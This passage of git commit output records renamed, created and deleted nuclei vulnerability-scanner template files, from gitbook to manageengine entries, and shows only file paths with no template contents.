gitbook-detect-7624.yaml} (100%) rename nuclei-templates/Other/{gitea-login-7645.yaml => gitea-login-7646.yaml} (100%) rename nuclei-templates/Other/{github-enterprise-detect.yaml => github-enterprise-detect-7649.yaml} (100%) rename nuclei-templates/Other/{github-gemfile-files.yaml => github-gemfile-files-7652.yaml} (100%) create mode 100644 nuclei-templates/Other/github-takeover-7660.yaml delete mode 100644 nuclei-templates/Other/github-takeover-7663.yaml rename nuclei-templates/Other/{github-workflows-disclosure-7664.yaml => github-workflows-disclosure-7665.yaml} (100%) rename nuclei-templates/Other/{gitlab-detect.yaml => gitlab-detect-7673.yaml} (100%) create mode 100644 nuclei-templates/Other/gitlab-public-repos-7677.yaml delete mode 100644 nuclei-templates/Other/gitlab-public-repos-7680.yaml rename nuclei-templates/Other/{gitlab-public-signup-7683.yaml => gitlab-public-signup-7684.yaml} (100%) create mode 100644 nuclei-templates/Other/gitlab-public-snippets-7685.yaml delete mode 100644 nuclei-templates/Other/gitlab-public-snippets-7686.yaml delete mode 100644 nuclei-templates/Other/gitlab-rce-7692.yaml create mode 100644 nuclei-templates/Other/gitlab-rce-7693.yaml rename nuclei-templates/Other/{gitlab-user-enum.yaml => gitlab-user-enum-7701.yaml} (100%) delete mode 100644 nuclei-templates/Other/gitlab-weak-login-7704.yaml create mode 100644 nuclei-templates/Other/gitlab-weak-login-7705.yaml rename nuclei-templates/Other/{global-domains-lfi-7715.yaml => global-domains-lfi-7714.yaml} (100%) delete mode 100644 nuclei-templates/Other/global-domains-xss-7717.yaml create mode 100644 nuclei-templates/Other/global-domains-xss-7718.yaml rename nuclei-templates/Other/{globalprotect-panel.yaml => globalprotect-panel-7719.yaml} (100%) rename nuclei-templates/Other/{gloo-unauth.yaml => gloo-unauth-7722.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi-9.3.3-sql-injection(1).yaml rename nuclei-templates/Other/{glpi-authentication.yaml => 
glpi-authentication-7729.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi-default-login-7731.yaml delete mode 100644 nuclei-templates/Other/glpi-default-login-7733.yaml rename nuclei-templates/Other/{glpi-telemetry-disclosure.yaml => glpi-telemetry-disclosure-7738.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi_CVE-2022-35914.yaml create mode 100644 nuclei-templates/Other/gnuboard-detect-7742.yaml delete mode 100644 nuclei-templates/Other/gnuboard-detect.yaml rename nuclei-templates/Other/{go-anywhere-client-7745.yaml => go-anywhere-client-7743.yaml} (100%) create mode 100644 nuclei-templates/Other/gocd-cruise-configuration-7746.yaml delete mode 100644 nuclei-templates/Other/gocd-cruise-configuration-7748.yaml delete mode 100644 nuclei-templates/Other/gogs-login-7759.yaml create mode 100644 nuclei-templates/Other/gogs-login.yaml create mode 100644 nuclei-templates/Other/goip-1-lfi-7762.yaml delete mode 100644 nuclei-templates/Other/goip-1-lfi-7764.yaml rename nuclei-templates/Other/{google-api-7772.yaml => google-api(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/google-api-key-7768.yaml create mode 100644 nuclei-templates/Other/google-api-key.yaml rename nuclei-templates/Other/{google-floc-disabled-7787.yaml => google-floc-disabled.yaml} (100%) create mode 100644 nuclei-templates/Other/google-secrets.yaml create mode 100644 nuclei-templates/Other/google-storage-7789.yaml delete mode 100644 nuclei-templates/Other/google-storage.yaml delete mode 100644 nuclei-templates/Other/google-textsearchplaces.yaml create mode 100644 nuclei-templates/Other/googlet-extsearchplaces.yaml rename nuclei-templates/Other/{gophish-default-login-7793.yaml => gophish-default-login-7792.yaml} (100%) rename nuclei-templates/{CVE-2024/CVE-2024-1728.yaml => Other/gradio-CVE-2024-1728.yaml} (100%) rename nuclei-templates/Other/{gradle-enterprise-panel-7800.yaml => gradle-enterprise-panel-7799.yaml} (100%) delete mode 100644 
nuclei-templates/Other/grafana-file-read-7811.yaml create mode 100644 nuclei-templates/Other/grafana-file-read.yaml create mode 100644 nuclei-templates/Other/grails-database-admin-console-7819.yaml delete mode 100644 nuclei-templates/Other/grails-database-admin-console-7820.yaml create mode 100644 nuclei-templates/Other/graphql-detect-7832.yaml delete mode 100644 nuclei-templates/Other/graphql-detect.yaml create mode 100644 nuclei-templates/Other/graphql-field-suggestion-7834.yaml delete mode 100644 nuclei-templates/Other/graphql-field-suggestion.yaml delete mode 100644 nuclei-templates/Other/graphql-get-method-7836.yaml create mode 100644 nuclei-templates/Other/graphql-get-method.yaml rename nuclei-templates/Other/{graylog-api-browser.yaml => graylog-api-browser-7846.yaml} (100%) create mode 100644 nuclei-templates/Other/groovy-console-open.yaml rename nuclei-templates/Other/{groupoffice-lfi-7851.yaml => groupoffice-lfi.yaml} (100%) create mode 100644 nuclei-templates/Other/gruntfile-exposure-7852.yaml delete mode 100644 nuclei-templates/Other/gruntfile-exposure.yaml create mode 100644 nuclei-templates/Other/gsoap-lfl(1).yaml rename nuclei-templates/Other/{GT-AC2900-login.yaml => gt-ac2900-login(1).yaml} (100%) rename nuclei-templates/Other/{gunicorn-detect-7862.yaml => gunicorn-detect-7864.yaml} (100%) delete mode 100644 nuclei-templates/Other/h2console-panel-7866.yaml create mode 100644 nuclei-templates/Other/h2console-panel.yaml create mode 100644 "nuclei-templates/Other/h3c secpath \350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237.yaml" delete mode 100644 nuclei-templates/Other/h3c-imc-rce-7870.yaml create mode 100644 nuclei-templates/Other/h3c-imc-rce-7871.yaml rename nuclei-templates/Other/{hadoop-exposure-7874.yaml => hadoop-exposure.yaml} (100%) delete mode 100644 nuclei-templates/Other/hadoop-unauth-7875.yaml create mode 100644 nuclei-templates/Other/hadoop-unauth-7878.yaml rename nuclei-templates/Other/{hanming-lfr.yaml => 
hanming-lfr-7880.yaml} (100%) rename nuclei-templates/Other/{hanwang-detect-7881.yaml => hanwang-detect-7882.yaml} (100%) rename nuclei-templates/Other/{harbor-detect-7886.yaml => harbor-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7890.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7891.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-webgui-7897.yaml delete mode 100644 nuclei-templates/Other/hashicorp-consul-webgui.yaml create mode 100644 nuclei-templates/Other/hasura-graphql-psql-exec-7901.yaml delete mode 100644 nuclei-templates/Other/hasura-graphql-psql-exec.yaml create mode 100644 nuclei-templates/Other/hb-audio-lfi-7911.yaml delete mode 100644 nuclei-templates/Other/hb-audio-lfi-7912.yaml rename nuclei-templates/Other/{ssrf-injection.yaml => header-injection(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/header_blind_xss-7914.yaml create mode 100644 nuclei-templates/Other/header_blind_xss-7915.yaml create mode 100644 nuclei-templates/Other/helpjuice-takeover-7925.yaml delete mode 100644 nuclei-templates/Other/helpjuice-takeover.yaml delete mode 100644 nuclei-templates/Other/helpscout-takeover-7935.yaml create mode 100644 nuclei-templates/Other/helpscout-takeover.yaml rename nuclei-templates/Other/{heroku-takeover-7941.yaml => heroku-takeover-7944.yaml} (100%) create mode 100644 nuclei-templates/Other/hikvision-detection-7954.yaml delete mode 100644 nuclei-templates/Other/hikvision-detection.yaml rename nuclei-templates/Other/{hitron-technologies-7959.yaml => hitron-technologies-7961.yaml} (100%) delete mode 100644 nuclei-templates/Other/hjtcloud-arbitrary-file-read-7967.yaml create mode 100644 nuclei-templates/Other/hjtcloud-arbitrary-file-read-7968.yaml delete mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read-7973.yaml create mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read-7976.yaml rename 
nuclei-templates/Other/{hmc-hybris-panel-7978.yaml => hmc-hybris-panel.yaml} (100%) rename nuclei-templates/Other/{homeautomation-v3-openredirect.yaml => homeautomation-v3-openredirect-7986.yaml} (100%) delete mode 100644 nuclei-templates/Other/honeywell-scada-config-7992.yaml create mode 100644 nuclei-templates/Other/honeywell-scada-config.yaml rename nuclei-templates/Other/{honeywell-web-controller-7996.yaml => honeywell-web-controller-7993.yaml} (100%) delete mode 100644 nuclei-templates/Other/hongdian-default-login-7997.yaml create mode 100644 nuclei-templates/Other/hongdian-default-login.yaml delete mode 100644 nuclei-templates/Other/host_poisening.yaml create mode 100644 nuclei-templates/Other/hostheaderpoisoning.yaml delete mode 100644 nuclei-templates/Other/hp-blade-admin-detect-8005.yaml create mode 100644 nuclei-templates/Other/hp-blade-admin-detect.yaml rename nuclei-templates/Other/{hp-device-info-detect-8008.yaml => hp-device-info-detect-8010.yaml} (100%) delete mode 100644 nuclei-templates/Other/hp-ilo-5-8021.yaml create mode 100644 nuclei-templates/Other/hp-ilo-5.yaml create mode 100644 nuclei-templates/Other/hp-laserjet-detect-8027.yaml delete mode 100644 nuclei-templates/Other/hp-laserjet-detect-8028.yaml rename nuclei-templates/Other/{hp-media-vault-detect.yaml => hp-media-vault-detect-8031.yaml} (100%) rename nuclei-templates/Other/{hp-service-manager-8034.yaml => hp-service-manager-8033.yaml} (100%) delete mode 100644 nuclei-templates/Other/hp-switch-default-login-8035.yaml create mode 100644 nuclei-templates/Other/hp-switch-default-login-8038.yaml create mode 100644 nuclei-templates/Other/hpe-system-management-login-8014.yaml delete mode 100644 nuclei-templates/Other/hpe-system-management-login-8017.yaml rename nuclei-templates/Other/{hrsale-unauthenticated-lfi-8040.yaml => hrsale-unauthenticated-lfi.yaml} (100%) rename nuclei-templates/Other/{hsort-fileRead.yaml => hsort-fileread.yaml} (100%) rename nuclei-templates/Other/{hst-fileRead.yaml => 
hst-fileread.yaml} (100%) delete mode 100644 nuclei-templates/Other/htaccess-config-8042.yaml create mode 100644 nuclei-templates/Other/htaccess-config.yaml create mode 100644 nuclei-templates/Other/htpasswd-detection-8046.yaml delete mode 100644 nuclei-templates/Other/htpasswd-detection.yaml create mode 100644 nuclei-templates/Other/http-etcd-unauthenticated-api-data-leak-8056.yaml delete mode 100644 nuclei-templates/Other/http-etcd-unauthenticated-api-data-leak.yaml rename nuclei-templates/Other/{http-raw.yaml => http-raw-multiple.yaml} (100%) create mode 100644 nuclei-templates/Other/httpbin-open-redirect-8047.yaml delete mode 100644 nuclei-templates/Other/httpbin-open-redirect.yaml rename nuclei-templates/Other/{dahua-publishing-fileupload.yaml => huatian-oa-upload-file-upload.yaml} (100%) create mode 100644 nuclei-templates/Other/huawei-HG532e-default-login.yaml delete mode 100644 nuclei-templates/Other/huawei-hg255s-lfi-8060.yaml create mode 100644 nuclei-templates/Other/huawei-hg255s-lfi-8061.yaml delete mode 100644 nuclei-templates/Other/huawei-hg532e-default-router-login-8062.yaml rename nuclei-templates/Other/{huawei-hg659-lfi.yaml => huawei-hg659-lfi-8067.yaml} (100%) delete mode 100644 nuclei-templates/Other/huawei-home-gateway-8072.yaml create mode 100644 nuclei-templates/Other/huawei-home-gateway.yaml rename nuclei-templates/Other/{huayu-Reporter-fileRead.yaml => huayu-reporter-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/hubspot-takeover-8079.yaml delete mode 100644 nuclei-templates/Other/hubspot-takeover.yaml delete mode 100644 nuclei-templates/Other/hubspot.yaml delete mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8082.yaml create mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8087.yaml rename nuclei-templates/Other/{ibm-advanced-system-management-8091.yaml => ibm-advanced-system-management-8088.yaml} (100%) delete mode 100644 nuclei-templates/Other/ibm-friendly-path-exposure-8092.yaml create mode 
100644 nuclei-templates/Other/ibm-friendly-path-exposure.yaml create mode 100644 nuclei-templates/Other/ibm-infoprint-lfi-8101.yaml delete mode 100644 nuclei-templates/Other/ibm-infoprint-lfi.yaml create mode 100644 nuclei-templates/Other/ibm-mqseries-default-login-8106.yaml delete mode 100644 nuclei-templates/Other/ibm-mqseries-default-login.yaml rename nuclei-templates/Other/{ibm-note-login-8111.yaml => ibm-note-login-8110.yaml} (100%) rename nuclei-templates/Other/{ibm-security-access-manager-8115.yaml => ibm-security-access-manager.yaml} (100%) rename nuclei-templates/Other/{ibm-sterling-detect.yaml => ibm-sterling-detect-8122.yaml} (100%) delete mode 100644 nuclei-templates/Other/ibm-storage-default-credential-8124.yaml create mode 100644 nuclei-templates/Other/ibm-storage-default-credential.yaml create mode 100644 nuclei-templates/Other/ibm-websphere-ssrf-8126.yaml delete mode 100644 nuclei-templates/Other/ibm-websphere-ssrf.yaml create mode 100644 nuclei-templates/Other/icewarp-webclient-rce-8133.yaml delete mode 100644 nuclei-templates/Other/icewarp-webclient-rce.yaml create mode 100644 nuclei-templates/Other/id-q-xss.yaml delete mode 100644 nuclei-templates/Other/id-xss.yaml rename nuclei-templates/Other/{idemia-biometrics-default-login-8138.yaml => idemia-biometrics-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/identity-services-engine-8147.yaml delete mode 100644 nuclei-templates/Other/identity-services-engine.yaml create mode 100644 nuclei-templates/Other/idor-vuln-params(1).yaml delete mode 100644 nuclei-templates/Other/idor-vuln-params.yaml rename nuclei-templates/Other/{iis-internal-ip-disclosure.yaml => iis-internal-ip-disclosure-8149.yaml} (100%) rename nuclei-templates/Other/{ilo-detect-8154.yaml => ilo-detect-8156.yaml} (100%) rename nuclei-templates/Other/{influxdb-detect.yaml => influxdb-detect-8160.yaml} (100%) create mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login-8162.yaml delete mode 100644 
nuclei-templates/Other/inspur-clusterengine-default-login.yaml create mode 100644 "nuclei-templates/Other/inspur-\346\224\277\345\212\241\347\263\273\347\273\237.yaml" delete mode 100644 nuclei-templates/Other/intercom-takeover-8166.yaml create mode 100644 nuclei-templates/Other/intercom-takeover.yaml delete mode 100644 nuclei-templates/Other/interlib-fileread-8170.yaml create mode 100644 nuclei-templates/Other/interlib-fileread-8171.yaml create mode 100644 nuclei-templates/Other/iomega-emc-shared-nas-8181.yaml delete mode 100644 nuclei-templates/Other/iomega-emc-shared-nas.yaml rename nuclei-templates/Other/{iotawatt-app-exposure.yaml => iotawatt-app-exposure-8187.yaml} (100%) delete mode 100644 nuclei-templates/Other/iplanet-imap-detect-8188.yaml create mode 100644 nuclei-templates/Other/iplanet-imap-detect.yaml rename nuclei-templates/Other/{iptime-default-login-8192.yaml => iptime-default-login-8193.yaml} (100%) delete mode 100644 nuclei-templates/Other/issuu-panel-lfi-8199.yaml create mode 100644 nuclei-templates/Other/issuu-panel-lfi.yaml delete mode 100644 nuclei-templates/Other/iterable.yaml delete mode 100644 nuclei-templates/Other/itop-detect-8201.yaml create mode 100644 nuclei-templates/Other/itop-detect-8203.yaml rename nuclei-templates/Other/{itop-panel.yaml => itop-panel-8205.yaml} (100%) create mode 100644 nuclei-templates/Other/ixcache-panel-8206.yaml delete mode 100644 nuclei-templates/Other/ixcache-panel.yaml create mode 100644 nuclei-templates/Other/jaeger-ui-dashboard-8207.yaml delete mode 100644 nuclei-templates/Other/jaeger-ui-dashboard.yaml delete mode 100644 nuclei-templates/Other/jamf-log4j-jndi-rce-8212.yaml create mode 100644 nuclei-templates/Other/jamf-log4j-jndi-rce.yaml rename nuclei-templates/Other/{jamf-panel.yaml => jamf-panel-8216.yaml} (100%) create mode 100644 nuclei-templates/Other/jaspersoft-detect-8218.yaml delete mode 100644 nuclei-templates/Other/jaspersoft-detect-8219.yaml create mode 100644 
nuclei-templates/Other/java-rmi-detect-8228.yaml delete mode 100644 nuclei-templates/Other/java-rmi-detect.yaml create mode 100644 nuclei-templates/Other/jazzhr-takeover-8233.yaml delete mode 100644 nuclei-templates/Other/jazzhr-takeover-8234.yaml create mode 100644 nuclei-templates/Other/jboss-detect-8237.yaml delete mode 100644 nuclei-templates/Other/jboss-detect.yaml create mode 100755 nuclei-templates/Other/jboss-status-8241.yaml delete mode 100644 nuclei-templates/Other/jboss-status-8243.yaml delete mode 100644 nuclei-templates/Other/jdbc-connection-string-8244.yaml create mode 100644 nuclei-templates/Other/jdbc-connection-string.yaml create mode 100644 nuclei-templates/Other/jeecg-boot-detect-8248.yaml delete mode 100644 nuclei-templates/Other/jeecg-boot-detect.yaml delete mode 100644 nuclei-templates/Other/jeewms-lfi-8253.yaml create mode 100644 nuclei-templates/Other/jeewms-lfi.yaml rename nuclei-templates/Other/{jenkins-api-panel-8261.yaml => jenkins-api-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8266.yaml delete mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8269.yaml delete mode 100644 nuclei-templates/Other/jenkins-default-8272.yaml create mode 100644 nuclei-templates/Other/jenkins-default-8273.yaml rename nuclei-templates/Other/{jenkins-detect-8275.yaml => jenkins-detect-8276.yaml} (100%) rename nuclei-templates/Other/{jenkins-login-8280.yaml => jenkins-login-8277.yaml} (100%) delete mode 100644 nuclei-templates/Other/jenkins-script-8281.yaml create mode 100644 nuclei-templates/Other/jenkins-script-8283.yaml create mode 100644 nuclei-templates/Other/jetty-showcontexts-enable-8295.yaml delete mode 100644 nuclei-templates/Other/jetty-showcontexts-enable.yaml create mode 100644 nuclei-templates/Other/jfrog-8306.yaml delete mode 100644 nuclei-templates/Other/jfrog-login.yaml delete mode 100644 nuclei-templates/Other/jfrog-unauth-build-exposed-8299.yaml create mode 100644 
nuclei-templates/Other/jfrog-unauth-build-exposed.yaml rename nuclei-templates/Other/{jinfornet-jreport-lfi-8307.yaml => jinfornet-jreport-lfi-8310.yaml} (100%) delete mode 100644 nuclei-templates/Other/jira-detect-8314.yaml create mode 100644 nuclei-templates/Other/jira-detect-8316.yaml create mode 100644 nuclei-templates/Other/jira-login-check.yaml delete mode 100644 nuclei-templates/Other/jira-login-default.yaml delete mode 100644 nuclei-templates/Other/jira-service-desk-signup-8317.yaml create mode 100644 nuclei-templates/Other/jira-service-desk-signup-8321.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards-8326.yaml delete mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards.yaml rename nuclei-templates/Other/{jira-unauthenticated-projectcategories.yaml => jira-unauthenticated-projectcategories-8332.yaml} (100%) create mode 100644 nuclei-templates/Other/jira-unauthenticated-user-picker-8341.yaml delete mode 100644 nuclei-templates/Other/jira-unauthenticated-user-picker.yaml rename nuclei-templates/Other/{jmx-console-8352.yaml => jmx-console-8353.yaml} (100%) rename nuclei-templates/Other/{jmx-default-login.yaml => jmx-default-login-8356.yaml} (100%) create mode 100644 nuclei-templates/Other/jolokia-8368.yaml delete mode 100644 nuclei-templates/Other/jolokia-8369.yaml create mode 100644 nuclei-templates/Other/jolokia-info-disclosure-8358.yaml delete mode 100644 nuclei-templates/Other/jolokia-info-disclosure.yaml create mode 100644 nuclei-templates/Other/jolokia-list-8360.yaml delete mode 100644 nuclei-templates/Other/jolokia-list.yaml rename nuclei-templates/Other/{joomla-com-fabrik-lfi-8373.yaml => joomla-com-fabrik-lfi-8371.yaml} (100%) rename nuclei-templates/Other/{joomla-config-file.yaml => joomla-config-file-8376.yaml} (100%) delete mode 100644 nuclei-templates/Other/joomla-htaccess-8381.yaml create mode 100644 nuclei-templates/Other/joomla-htaccess-8383.yaml create mode 100644 
nuclei-templates/Other/joomla-manifest-file-8387.yaml delete mode 100644 nuclei-templates/Other/joomla-manifest-file.yaml delete mode 100644 nuclei-templates/Other/joomla-panel-8389.yaml create mode 100644 nuclei-templates/Other/joomla-panel-8391.yaml delete mode 100644 nuclei-templates/Other/joomla.yaml create mode 100644 nuclei-templates/Other/jsf-detection-8398.yaml delete mode 100644 nuclei-templates/Other/jsf-detection.yaml create mode 100644 nuclei-templates/Other/jupyter-ipython-unauth-8405.yaml delete mode 100644 nuclei-templates/Other/jupyter-ipython-unauth.yaml create mode 100644 nuclei-templates/Other/jupyter-notebook-8407.yaml delete mode 100644 nuclei-templates/Other/jupyter-notebook.yaml create mode 100644 nuclei-templates/Other/jwt-token-8408.yaml delete mode 100644 nuclei-templates/Other/jwt-token-8410.yaml create mode 100644 nuclei-templates/Other/kafka-center-default-login-8415.yaml delete mode 100644 nuclei-templates/Other/kafka-center-default-login.yaml rename nuclei-templates/Other/{kafka-connect-ui.yaml => kafka-connect-ui-8420.yaml} (100%) rename nuclei-templates/Other/{kafka-consumer-monitor-8425.yaml => kafka-consumer-monitor.yaml} (100%) create mode 100644 nuclei-templates/Other/kafka-cruise-control-8427.yaml delete mode 100644 nuclei-templates/Other/kafka-cruise-control.yaml rename nuclei-templates/Other/{kafka-topics-ui-8432.yaml => kafka-topics-ui-8434.yaml} (100%) rename nuclei-templates/Other/{keenetic-web-login-8442.yaml => keenetic-web-login-8443.yaml} (100%) create mode 100644 nuclei-templates/Other/kenesto-login-8445.yaml delete mode 100644 nuclei-templates/Other/kenesto-login.yaml rename nuclei-templates/Other/{kentico-login-8446.yaml => kentico-login-8447.yaml} (100%) create mode 100644 nuclei-templates/Other/keo-klr300n-install.yaml rename nuclei-templates/Other/{kerio-connect-client-8450.yaml => kerio-connect-client-8452.yaml} (100%) delete mode 100644 nuclei-templates/Other/kevinlab-bems-backdoor-8453.yaml create mode 100644 
nuclei-templates/Other/kevinlab-bems-backdoor-8456.yaml rename nuclei-templates/Other/{kevinlab-bems-sqli.yaml => kevinlab-bems-sqli-8459.yaml} (100%) delete mode 100644 nuclei-templates/Other/kevinlab-hems-backdoor-8466.yaml create mode 100644 nuclei-templates/Other/kevinlab-hems-backdoor.yaml create mode 100644 nuclei-templates/Other/key-cloak-admin-panel-8468.yaml delete mode 100644 nuclei-templates/Other/key-cloak-admin-panel-8470.yaml delete mode 100644 nuclei-templates/Other/keycloak-json-8472.yaml create mode 100644 nuclei-templates/Other/keycloak-json.yaml create mode 100644 nuclei-templates/Other/keycloak-openid-config-8475.yaml delete mode 100644 nuclei-templates/Other/keycloak-openid-config.yaml create mode 100644 nuclei-templates/Other/keycloak-xss-8478.yaml delete mode 100644 nuclei-templates/Other/keycloak-xss-8481.yaml rename nuclei-templates/Other/{kibana-detect-8484.yaml => kibana-detect.yaml} (100%) rename nuclei-templates/Other/{kibana-panel.yaml => kibana-panel-8485.yaml} (100%) create mode 100644 nuclei-templates/Other/kingdee-eas.yaml create mode 100644 "nuclei-templates/Other/kingdee\344\272\247\345\223\201.yaml" rename nuclei-templates/Other/{Kingsoft-default-login.yaml => kingsoft-default-login.yaml} (100%) rename nuclei-templates/Other/{Kingsoft-upload.yaml => kingsoft-upload.yaml} (100%) create mode 100644 nuclei-templates/Other/kingsoft-v8-file-read-8491.yaml delete mode 100644 nuclei-templates/Other/kingsoft-v8-file-read.yaml create mode 100644 nuclei-templates/Other/kinsta-takeover-8493.yaml delete mode 100644 nuclei-templates/Other/kinsta-takeover-8494.yaml delete mode 100644 nuclei-templates/Other/klr300n-installer.yaml rename nuclei-templates/Other/{Konga-default-login.yaml => konga-default-login.yaml} (100%) rename nuclei-templates/Other/{kube-api-deployments-8503.yaml => kube-api-deployments.yaml} (100%) delete mode 100644 nuclei-templates/Other/kube-api-pods-8509.yaml create mode 100644 nuclei-templates/Other/kube-api-pods.yaml 
create mode 100644 nuclei-templates/Other/kube-api-secrets-8511.yaml delete mode 100644 nuclei-templates/Other/kube-api-secrets.yaml delete mode 100644 nuclei-templates/Other/kube-api-services-8513.yaml create mode 100644 nuclei-templates/Other/kube-api-services-8514.yaml create mode 100644 nuclei-templates/Other/kubeflow-dashboard-unauth-8515.yaml delete mode 100644 nuclei-templates/Other/kubeflow-dashboard-unauth.yaml rename nuclei-templates/Other/{kubelet-pods-8522.yaml => kubelet-pods.yaml} (100%) delete mode 100644 nuclei-templates/Other/kubelet-runningpods-8525.yaml create mode 100644 nuclei-templates/Other/kubelet-scan.yaml rename nuclei-templates/Other/{kubernetes-kustomization-disclosure-8532.yaml => kubernetes-kustomization-disclosure.yaml} (100%) create mode 100644 nuclei-templates/Other/kubernetes-mirantis-8541.yaml delete mode 100644 nuclei-templates/Other/kubernetes-mirantis.yaml rename nuclei-templates/Other/{kubernetes-pods-api.yaml => kubernetes-pods-8546.yaml} (100%) rename nuclei-templates/Other/{Kubernetes-unauth.yaml => kubernetes-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/kubio.yaml create mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi-8557.yaml delete mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi-8559.yaml create mode 100644 nuclei-templates/Other/landingi-takeover-8566.yaml delete mode 100644 nuclei-templates/Other/landingi-takeover-8567.yaml create mode 100644 nuclei-templates/Other/landray-oa-fileread-8569.yaml delete mode 100644 nuclei-templates/Other/landray-oa-fileread.yaml delete mode 100644 nuclei-templates/Other/landray-oa-treexml-rce.yaml create mode 100644 nuclei-templates/Other/lansweeper-login-8572.yaml delete mode 100644 nuclei-templates/Other/lansweeper-login.yaml create mode 100644 nuclei-templates/Other/laravel-debug-enabled-8576.yaml delete mode 100644 nuclei-templates/Other/laravel-debug-enabled-8577.yaml rename nuclei-templates/Other/{laravel-env-8586.yaml => laravel-env-8580.yaml} 
(100%) create mode 100644 nuclei-templates/Other/laravel-log-file-8597.yaml delete mode 100644 nuclei-templates/Other/laravel-log-file-8598.yaml create mode 100644 nuclei-templates/Other/lazy-file-8608.yaml delete mode 100644 nuclei-templates/Other/lazy-file.yaml create mode 100644 nuclei-templates/Other/lfi-linux-fuzz.yaml rename nuclei-templates/Other/{express-lfr (copy 1).yaml => lfr_express.yaml} (100%) rename nuclei-templates/Other/{liferay-portal-detect-8624.yaml => liferay-portal-detect-8626.yaml} (100%) delete mode 100644 nuclei-templates/Other/linkedin-id-11853.yaml create mode 100644 nuclei-templates/Other/linkedin-id.yaml create mode 100644 nuclei-templates/Other/linkerd-badrule-detect-8630.yaml delete mode 100644 nuclei-templates/Other/linkerd-detect.yaml delete mode 100644 nuclei-templates/Other/linkerd-service-detect-8634.yaml create mode 100644 nuclei-templates/Other/linkerd-service-detect.yaml create mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8637.yaml delete mode 100644 nuclei-templates/Other/linkerd-ssrf-detect.yaml delete mode 100644 nuclei-templates/Other/linux-lfi-fuzz.yaml delete mode 100644 nuclei-templates/Other/linux-lfi-fuzzing.yaml rename nuclei-templates/Other/{liveview-axis-camera.yaml => liveview-axis-camera-8648.yaml} (100%) create mode 100644 nuclei-templates/Other/log4j-fuzz-head-poc.yaml delete mode 100644 nuclei-templates/Other/log4j-header.yaml delete mode 100644 nuclei-templates/Other/log4j-rce.yaml delete mode 100644 nuclei-templates/Other/log4jshell-detect.yaml create mode 100644 nuclei-templates/Other/log4jshell.yaml create mode 100644 nuclei-templates/Other/lotus-domino-version-8655.yaml delete mode 100644 nuclei-templates/Other/lotus-domino-version-8656.yaml create mode 100644 nuclei-templates/Other/lucee-login-8663.yaml delete mode 100644 nuclei-templates/Other/lucee-login-8665.yaml create mode 100644 nuclei-templates/Other/lucee-stack-trace-8668.yaml delete mode 100644 
nuclei-templates/Other/lucee-stack-trace.yaml delete mode 100644 nuclei-templates/Other/luftguitar-arbitrary-file-upload-8672.yaml create mode 100644 nuclei-templates/Other/luftguitar-arbitrary-file-upload.yaml rename nuclei-templates/Other/{maccmsv10-backdoor-8686.yaml => maccmsv10-backdoor-8683.yaml} (100%) delete mode 100644 nuclei-templates/Other/magento-2-exposed-api-8688.yaml create mode 100644 nuclei-templates/Other/magento-2-exposed-api-8689.yaml delete mode 100644 nuclei-templates/Other/magento-admin-panel-8692.yaml create mode 100644 nuclei-templates/Other/magento-admin-panel-8695.yaml delete mode 100644 nuclei-templates/Other/magento-cacheleak-8696.yaml create mode 100644 nuclei-templates/Other/magento-cacheleak-8698.yaml rename nuclei-templates/Other/{magento-config-8702.yaml => magento-config.yaml} (100%) create mode 100644 nuclei-templates/Other/magento-detect-8705.yaml delete mode 100644 nuclei-templates/Other/magento-detect.yaml rename nuclei-templates/Other/{magento-config-disclosure.yaml => magento-information-disclosure.yaml} (100%) create mode 100644 nuclei-templates/Other/magento-unprotected-dev-files-8709.yaml delete mode 100644 nuclei-templates/Other/magento-unprotected-dev-files.yaml rename nuclei-templates/Other/{MagicFlow-sqli.yaml => magicflow-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/maian-cart-detect-8719.yaml delete mode 100644 nuclei-templates/Other/maian-cart-detect.yaml delete mode 100644 nuclei-templates/Other/mailchimp-api-11854.yaml create mode 100644 nuclei-templates/Other/mailchimp-api.yaml delete mode 100644 nuclei-templates/Other/manage-engine-admanager-panel-8731.yaml create mode 100644 nuclei-templates/Other/manage-engine-admanager-panel.yaml delete mode 100644 nuclei-templates/Other/manageengine-adaudit-8728.yaml create mode 100644 nuclei-templates/Other/manageengine-adaudit.yaml rename nuclei-templates/Other/{manageengine-adselfservice.yaml => manageengine-adselfservice-8736.yaml} (100%) rename 
nuclei-templates/Other/{manageengine-analytics-8742.yaml => manageengine-analytics.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk-8747.yaml delete mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk.yaml rename nuclei-templates/Other/{manageengine-applications-manager-8753.yaml => manageengine-applications-manager-8752.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8756.yaml delete mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8757.yaml delete mode 100644 nuclei-templates/Other/manageengine-keymanagerplus-8764.yaml create mode 100644 nuclei-templates/Other/manageengine-keymanagerplus.yaml create mode 100644 nuclei-templates/Other/manageengine-opmanager-8767.yaml delete mode 100644 nuclei-templates/Other/manageengine-opmanager-8768.yaml create mode 100644 nuclei-templates/Other/manageengine-servicedesk-8771.yaml delete mode 100644 nuclei-templates/Other/manageengine-servicedesk-8772.yaml delete mode 100644 